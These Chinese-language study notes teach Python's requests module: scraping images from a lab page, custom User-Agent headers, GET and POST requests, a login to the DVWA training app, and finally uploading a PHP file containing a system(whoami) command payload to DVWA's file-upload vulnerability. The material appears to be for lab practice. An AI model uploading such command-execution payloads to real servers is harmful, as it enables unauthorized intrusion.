编写简单的爬虫脚本
编写一个爬虫脚本:
使用requests 模块获取网页内容;
在网页内容中提取图片地址;
将图片保存在文件中;
------------------------------------------------------------------------------------------------
首先捕获网页内容
修改User-Agent信息
查看图片名称
获得图片地址
将图片保存在文档中
import requests
import re
url = "http://192.168.8.135/jianpan/index.html"
def gohtml(url) :
headers = {
"User-Agent" : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0'
}
res = requests.get(url = url,headers = headers)
html = res.text
return html
def getjpg(html):
return re.findall("style/\w*.jpg",html)
html = gohtml(url)
htt = getjpg(html)
s = 0
for i in htt :
res = requests.get(url = url + i)
s += 1
with open("./jp/{}.jpg".format(s),'wb') as f :
f.write(res.content)
-------------------------------------------------------------------------------------------------
练习requests 模块高阶用法
自定义指纹
# 5.2高级.py
#自定义浏览器指纹
import requests
url = "http://192.168.8.135/jianpan/"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\
Chrome/93.0.4577.82 Safari/537.36"
}
res = requests.get(url = url, headers = headers)
print(res.request.headers['User-Agent'])
发送get函数
拼接在url中
import requests
url = "http://192.168.8.135/cms/show.php"
params = "?id=33"
fullUrl = url + params
res = requests.get(url = fullUrl)
print(res.text)
利用params 参数
import requests
url = "http://192.168.8.135/cms/show.php"
params = {
'id' : '32'
}
res = requests.get(url = url,params = params)
print(res.text)
发送POST 参数
import requests
url = "http://192.168.8.137/dvwa/login.php"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
}
data = {
"username" : "1337",
"password" : "charley",
"Login" : "Login"
}
res = requests.post(url = url, headers = headers, data = data)
print(res.text)
文件上传
import requests
url = "http://192.168.8.137/dvwa/vulnerabilities/upload/"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36",
"Cookie" : "security=low; PHPSESSID=iuiris2tep6u7vhr4r4lgkatu3"
}
data = {
"MAX_FILE_SIZE" : '100000',
"Upload" : "Upload"
}
files = {
"uploaded" : ("info.php", b"<? system(whoami)?>", "application/x-php")
}
res = requests.post(url = url, files = files , headers = headers, data = data)
print(url + res.text[res.text.index("<pre>"):res.text.index("</pre>")][5:-22])